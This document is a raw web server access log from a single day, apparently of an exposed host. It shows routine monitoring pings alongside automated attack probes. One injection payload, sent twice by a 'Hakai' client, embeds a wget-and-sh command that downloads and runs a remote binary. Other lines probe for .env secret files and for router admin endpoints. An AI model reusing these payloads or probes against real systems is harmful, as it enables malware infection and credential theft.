212.91.246.72 - - [03/Mar/2023:17:47:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.34.146.227 - - [03/Mar/2023:17:48:17 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Mar/2023:17:48:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:17:49:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:17:50:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:17:50:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:17:51:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:17:52:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:17:52:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:17:53:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:17:54:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:17:55:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.233.62.116 - - [03/Mar/2023:17:56:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
34.140.248.32 - - [03/Mar/2023:17:56:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [03/Mar/2023:17:56:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:17:57:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:17:58:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.255.233.24 - - [03/Mar/2023:17:59:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/Mar/2023:17:59:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:00:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:01:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:02:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [03/Mar/2023:18:02:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
183.136.225.43 - - [03/Mar/2023:18:03:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [03/Mar/2023:18:03:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.43 - - [03/Mar/2023:18:03:48 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [03/Mar/2023:18:04:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:18:04:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:18:05:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:06:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
200.36.150.7 - - [03/Mar/2023:18:06:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
4.1.229.86 - - [03/Mar/2023:18:06:57 +0100] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.1.229.86 - - [03/Mar/2023:18:06:57 +0100] "POST /public HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.1.229.86 - - [03/Mar/2023:18:07:04 +0100] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.1.229.86 - - [03/Mar/2023:18:07:04 +0100] "POST /public HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:18:07:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:18:07:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:18:08:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.1.229.86 - - [03/Mar/2023:18:08:58 +0100] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.1.229.86 - - [03/Mar/2023:18:08:59 +0100] "POST /public HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:18:09:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:18:10:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:18:10:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:11:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:12:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:13:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.206.240.138 - - [03/Mar/2023:18:14:00 +0100] "GET /cgi-bin/admin_console.cgi HTTP/1.1" 404 330 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Mar/2023:18:14:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:15:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:16:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:17:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:18:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:19:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:20:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.59.78.189 - - [03/Mar/2023:18:21:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
139.59.78.189 - - [03/Mar/2023:18:21:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
139.59.78.189 - - [03/Mar/2023:18:21:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
139.59.78.189 - - [03/Mar/2023:18:21:24 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:18:21:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.59 - - [03/Mar/2023:18:22:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Mar/2023:18:22:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:23:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:24:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:25:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:26:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:27:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:28:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [03/Mar/2023:18:28:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:18:29:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [03/Mar/2023:18:29:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:18:30:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:31:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.240.118.145 - - [03/Mar/2023:18:31:42 +0100] "\x03" 501 316 "-" "-"
91.240.118.145 - - [03/Mar/2023:18:31:42 +0100] "\x03" 501 316 "-" "-"
91.240.118.145 - - [03/Mar/2023:18:31:42 +0100] "\x03" 501 316 "-" "-"
91.240.118.145 - - [03/Mar/2023:18:31:42 +0100] "\x03" 501 316 "-" "-"
91.240.118.145 - - [03/Mar/2023:18:31:42 +0100] "\x03" 501 316 "-" "-"
91.240.118.145 - - [03/Mar/2023:18:31:42 +0100] "\x03" 501 316 "-" "-"
91.240.118.145 - - [03/Mar/2023:18:31:45 +0100] "\x03" 501 316 "-" "-"
91.240.118.145 - - [03/Mar/2023:18:31:45 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Mar/2023:18:32:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:33:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:18:34:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:18:34:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:35:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:36:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:37:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.160.62.190 - - [03/Mar/2023:18:38:16 +0100] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
93.160.62.190 - - [03/Mar/2023:18:38:17 +0100] "POST /app HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:18:38:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [03/Mar/2023:18:38:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:18:39:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [03/Mar/2023:18:39:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:18:40:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.82 - - [03/Mar/2023:18:40:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:18:40:30 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
185.246.220.98 - - [03/Mar/2023:18:41:14 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
179.43.177.242 - - [03/Mar/2023:18:41:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:18:41:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.34.146.227 - - [03/Mar/2023:18:42:17 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Mar/2023:18:42:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:43:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.2 - - [03/Mar/2023:18:43:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Mar/2023:18:48:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.246.220.98 - - [03/Mar/2023:18:48:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
167.172.133.147 - - [03/Mar/2023:18:48:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.172.133.147 - - [03/Mar/2023:18:48:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
167.172.133.147 - - [03/Mar/2023:18:48:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.172.133.147 - - [03/Mar/2023:18:48:25 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
92.118.39.82 - - [03/Mar/2023:18:48:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:18:48:49 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [03/Mar/2023:18:49:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:50:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.82 - - [03/Mar/2023:18:50:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:18:50:41 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
212.91.246.72 - - [03/Mar/2023:18:51:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:18:51:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:18:52:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.98.177.10 - - [03/Mar/2023:18:52:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
198.235.24.158 - - [03/Mar/2023:18:53:00 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Mar/2023:18:53:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.157.58 - - [03/Mar/2023:18:53:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
212.91.246.72 - - [03/Mar/2023:18:54:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:55:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:56:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:57:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:18:58:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [03/Mar/2023:18:58:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:18:59:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [03/Mar/2023:18:59:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
183.136.225.43 - - [03/Mar/2023:18:59:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
212.91.246.72 - - [03/Mar/2023:19:00:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.43 - - [03/Mar/2023:19:00:09 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
179.43.177.242 - - [03/Mar/2023:19:00:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Mar/2023:19:01:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:02:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:03:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:04:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.24 - - [03/Mar/2023:19:04:06 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Mar/2023:19:05:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.90.190.62 - - [03/Mar/2023:19:06:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:19:06:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:07:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [03/Mar/2023:19:07:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
92.118.39.82 - - [03/Mar/2023:19:07:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:19:07:27 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
69.162.243.124 - - [03/Mar/2023:19:07:49 +0100] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.243.124 - - [03/Mar/2023:19:07:50 +0100] "POST /apps HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:19:08:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:19:09:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
69.162.243.124 - - [03/Mar/2023:19:09:09 +0100] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.162.243.124 - - [03/Mar/2023:19:09:09 +0100] "POST /apps HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
92.118.39.82 - - [03/Mar/2023:19:09:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [03/Mar/2023:19:09:42 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
